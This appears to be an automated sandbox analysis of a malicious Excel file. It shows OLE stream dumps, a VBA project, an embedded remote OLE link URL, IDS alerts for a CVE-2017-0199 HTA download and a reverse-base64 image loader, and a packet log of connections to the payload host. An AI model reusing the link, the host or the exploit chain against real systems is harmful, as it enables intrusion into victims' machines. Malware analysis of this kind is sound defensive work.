                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:99
                                                                                              Entropy:3.631242196770981
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Stream Path: MBD0026E5D5/MBD00032715/Package, File Type: Microsoft Excel 2007+, Stream Size: 38341
                                                                                              General
                                                                                              Stream Path:MBD0026E5D5/MBD00032715/Package
                                                                                              CLSID:
                                                                                              File Type:Microsoft Excel 2007+
                                                                                              Stream Size:38341
                                                                                              Entropy:7.85773182578822
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Stream Path: MBD0026E5D5/MBD00032B6D/\x1CompObj, File Type: data, Stream Size: 114
                                                                                              General
                                                                                              Stream Path:MBD0026E5D5/MBD00032B6D/\x1CompObj
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:114
                                                                                              Entropy:4.25248375192737
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Stream Path: MBD0026E5D5/MBD00032B6D/\x5DocumentSummaryInformation, File Type: data, Stream Size: 484
                                                                                              General
                                                                                              Stream Path:MBD0026E5D5/MBD00032B6D/\x5DocumentSummaryInformation
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:484
                                                                                              Entropy:3.922883556049869
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , D . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . I N V . . . . . P L . . . . . D P L - 1 . . . . . I N V ! P r i n t _ A r e a . . . . . P L ! P r i n t _ A r e a . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 01 00 00 00 01 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00
                                                                                              Stream Path: MBD0026E5D5/MBD00032B6D/\x5SummaryInformation, File Type: data, Stream Size: 19956
                                                                                              General
                                                                                              Stream Path:MBD0026E5D5/MBD00032B6D/\x5SummaryInformation
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:19956
                                                                                              Entropy:3.047871976270467
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . M . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . y d t . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . W P S O f f i c e . . @ . . . . E . w . @ . . . . . 2 . @ . . . . . . . % . . . . . . . . . G . . . . M . . . . . . . . ? . . . . . . . . . | & . . . . . . . . . . . . . . & . . . " W M F C . . . .
                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c4 4d 00 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 64 00 00 00 12 00 00 00 74 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 11 00 00 00 b4 00 00 00
                                                                                              Stream Path: MBD0026E5D5/MBD00032B6D/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 95624
                                                                                              General
                                                                                              Stream Path:MBD0026E5D5/MBD00032B6D/Workbook
                                                                                              CLSID:
                                                                                              File Type:Applesoft BASIC program data, first line number 16
                                                                                              Stream Size:95624
                                                                                              Entropy:3.890268972586762
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . Q | 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . .
                                                                                              Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 02 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                              Stream Path: MBD0026E5D5/MBD00033186/\x1CompObj, File Type: data, Stream Size: 114
                                                                                              General
                                                                                              Stream Path:MBD0026E5D5/MBD00033186/\x1CompObj
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:114
                                                                                              Entropy:4.219515110876372
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Stream Path: MBD0026E5D5/MBD00033186/Package, File Type: Microsoft Excel 2007+, Stream Size: 52190
                                                                                              General
                                                                                              Stream Path:MBD0026E5D5/MBD00033186/Package
                                                                                              CLSID:
                                                                                              File Type:Microsoft Excel 2007+
                                                                                              Stream Size:52190
                                                                                              Entropy:7.870757596146126
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:P K . . . . . . . . . . ! . . p @ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 13 70 40 80 a3 01 00 00 e2 05 00 00 13 00 cf 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 cb 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Stream Path: MBD0026E5D5/MBD0018D4CE/\x1Ole, File Type: data, Stream Size: 20
                                                                                              General
                                                                                              Stream Path:MBD0026E5D5/MBD0018D4CE/\x1Ole
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:20
                                                                                              Entropy:0.5689955935892812
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Stream Path: MBD0026E5D5/MBD0018D4CE/\x3ObjInfo, File Type: data, Stream Size: 4
                                                                                              General
                                                                                              Stream Path:MBD0026E5D5/MBD0018D4CE/\x3ObjInfo
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:4
                                                                                              Entropy:0.8112781244591328
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . .
                                                                                              Data Raw:00 00 03 00
                                                                                              Stream Path: MBD0026E5D5/MBD0018D4CE/Contents, File Type: Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c, Stream Size: 197671
                                                                                              General
                                                                                              Stream Path:MBD0026E5D5/MBD0018D4CE/Contents
                                                                                              CLSID:
                                                                                              File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                                                                                              Stream Size:197671
                                                                                              Entropy:6.989042939766534
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Stream Path: MBD0026E5D5/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 212905
                                                                                              General
                                                                                              Stream Path:MBD0026E5D5/Workbook
                                                                                              CLSID:
                                                                                              File Type:Applesoft BASIC program data, first line number 16
                                                                                              Stream Size:212905
                                                                                              Entropy:7.612848324441619
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . ` < x - 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                              Stream Path: MBD0026E5D6/\x1Ole, File Type: data, Stream Size: 722
                                                                                              General
                                                                                              Stream Path:MBD0026E5D6/\x1Ole
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:722
                                                                                              Entropy:4.612786048273898
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . ? c Q . u . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . u . 4 . u . . . k . i . d . s . / . L . U . S . V . b . x . ? . & . t . r . i . n . k . e . t . = . n . i . c . e . & . d . y . n . a . m . o . = . q . u . i . z . z . i . c . a . l . & . j . o . b . = . u . p . p . i . t . y . & . i . m . a . g . i . n . a . t . i . o . n . = . m . o . d . e . r . n . & . f . l . u . t . e . = . b . o . i . l . i . n . g . & . S . U . V . = . m . o . t . i . o . n . l . e . s
                                                                                              Data Raw:01 00 00 02 3f 8e 63 51 db a8 99 75 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 8c 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 75 00 34 00 75 00 2e 00 6b 00 69 00 64 00 73 00 2f 00 4c 00 55 00 53 00 56 00 62 00 78 00 3f 00 26 00 74 00 72 00 69 00 6e 00 6b 00 65 00 74 00 3d 00 6e 00 69 00 63 00 65 00 26 00 64 00 79 00
                                                                                              Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 312403
                                                                                              General
                                                                                              Stream Path:Workbook
                                                                                              CLSID:
                                                                                              File Type:Applesoft BASIC program data, first line number 16
                                                                                              Stream Size:312403
                                                                                              Entropy:7.9986452340211
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . + _ 5 k . 3 y . t . G . / x Q . . 7 2 S q 0 % = . . . . . . . - . . . \\ . p . L G . < . O s ( k . ? h w K U . [ . U % p R / l & . X 9 y D a . 7 * u . i c * \\ n . b . U h . k C ( ^ 4 z z @ 0 B . . . B . . . Z a . . . ] 3 . . . = . . . . Y . . . . . p . . & ^ w W . . . . . $ . . . . . . . . . . . . . g . . . . . . @ = . . . V Q w = Q . . $ . . 7 @ . . . . . . r " . . . . . . . % . . . 8 . . . Z 1 . . . $ ^ 7 . . t M f . . m . - a P . ? < p % 1 . . . . .
                                                                                              Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 12 2b ed 5f 35 6b a8 11 33 79 d7 96 74 0d 8c 47 11 2f 8b 9e 8a 78 f9 88 9f e1 51 86 0d ae 1c 37 32 90 8e 9c e9 8c 53 71 94 30 81 a2 91 c4 25 3d e1 00 02 00 b0 04 c1 00 02 00 aa 2d e2 00 00 00 5c 00 70 00 4c c5 47 89 07 c1 b5 3c ec 0f 4f d8 da df 73 28 a4 6b f6 e5 d2 b6 3f a7 68 ad ec d0 77 c3
                                                                                              Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 535
                                                                                              General
                                                                                              Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                              CLSID:
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Stream Size:535
                                                                                              Entropy:5.297593062281836
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:I D = " { 6 E E E 9 8 B 2 - 6 5 2 A - 4 E 6 8 - B F F 6 - F 1 1 0 B D 8 8 F E 3 E } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " E 7 E 5 D 7 6 5 3 7 A 5 A 3 A 9 A
                                                                                              Data Raw:49 44 3d 22 7b 36 45 45 45 39 38 42 32 2d 36 35 32 41 2d 34 45 36 38 2d 42 46 46 36 2d 46 31 31 30 42 44 38 38 46 45 33 45 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                                              Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
                                                                                              General
                                                                                              Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:104
                                                                                              Entropy:3.0488640812019017
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                                              Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                                                              Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644
                                                                                              General
                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:2644
                                                                                              Entropy:3.9892167554195908
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                                              Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                                              Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553
                                                                                              General
                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:553
                                                                                              Entropy:6.375377252481979
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . Q + i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
                                                                                              Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 0b 51 2b 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                                              Network Behavior

                                                                                              Suricata IDS Alerts

                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                              2024-10-24T08:39:29.928648+02002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249162192.210.215.880TCP
                                                                                              2024-10-24T08:39:29.928661+02002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1192.210.215.880192.168.2.2249162TCP
                                                                                              2024-10-24T08:39:33.317459+02002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249164192.210.215.880TCP
                                                                                              2024-10-24T08:39:33.317474+02002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1192.210.215.880192.168.2.2249164TCP
                                                                                              2024-10-24T08:39:54.716795+02002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249170192.210.215.880TCP
                                                                                              2024-10-24T08:40:06.632900+02002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21142.250.186.97443192.168.2.2249172TCP
                                                                                              2024-10-24T08:40:14.905847+02002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21142.250.186.97443192.168.2.2249174TCP

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Oct 24, 2024 08:39:28.131133080 CEST49161443192.168.2.2224.199.88.84
                                                                                              Oct 24, 2024 08:39:28.131164074 CEST4434916124.199.88.84192.168.2.22
                                                                                              Oct 24, 2024 08:39:28.131231070 CEST49161443192.168.2.2224.199.88.84
                                                                                              Oct 24, 2024 08:39:28.227283955 CEST49161443192.168.2.2224.199.88.84
                                                                                              Oct 24, 2024 08:39:28.227303028 CEST4434916124.199.88.84192.168.2.22
                                                                                              Oct 24, 2024 08:39:28.931322098 CEST4434916124.199.88.84192.168.2.22
                                                                                              Oct 24, 2024 08:39:28.931437016 CEST49161443192.168.2.2224.199.88.84
                                                                                              Oct 24, 2024 08:39:28.939646959 CEST49161443192.168.2.2224.199.88.84
                                                                                              Oct 24, 2024 08:39:28.939654112 CEST4434916124.199.88.84192.168.2.22
                                                                                              Oct 24, 2024 08:39:28.940004110 CEST4434916124.199.88.84192.168.2.22
                                                                                              Oct 24, 2024 08:39:28.940066099 CEST49161443192.168.2.2224.199.88.84
                                                                                              Oct 24, 2024 08:39:29.062031031 CEST49161443192.168.2.2224.199.88.84
                                                                                              Oct 24, 2024 08:39:29.103339911 CEST4434916124.199.88.84192.168.2.22
                                                                                              Oct 24, 2024 08:39:29.234380007 CEST4434916124.199.88.84192.168.2.22
                                                                                              Oct 24, 2024 08:39:29.234453917 CEST4434916124.199.88.84192.168.2.22
                                                                                              Oct 24, 2024 08:39:29.234483957 CEST49161443192.168.2.2224.199.88.84
                                                                                              Oct 24, 2024 08:39:29.234527111 CEST49161443192.168.2.2224.199.88.84
                                                                                              Oct 24, 2024 08:39:29.235538960 CEST49161443192.168.2.2224.199.88.84
                                                                                              Oct 24, 2024 08:39:29.235559940 CEST4434916124.199.88.84192.168.2.22
                                                                                              Oct 24, 2024 08:39:29.247009039 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:29.252477884 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:29.252542973 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:29.252609968 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:29.257968903 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:29.928579092 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:29.928594112 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:29.928605080 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:29.928616047 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:29.928627968 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:29.928637028 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:29.928647995 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:29.928647995 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:29.928661108 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:29.928663969 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:29.928670883 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:29.928683043 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:29.928683996 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:29.928703070 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:29.928709984 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:29.934036016 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:29.934047937 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:29.934055090 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:29.934098005 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:29.934333086 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.047189951 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.047213078 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.047230959 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.047244072 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.047255039 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.047260046 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.047297001 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.047297001 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.047750950 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.047791958 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.047878027 CEST8049162192.210.215.8192.168.2.22
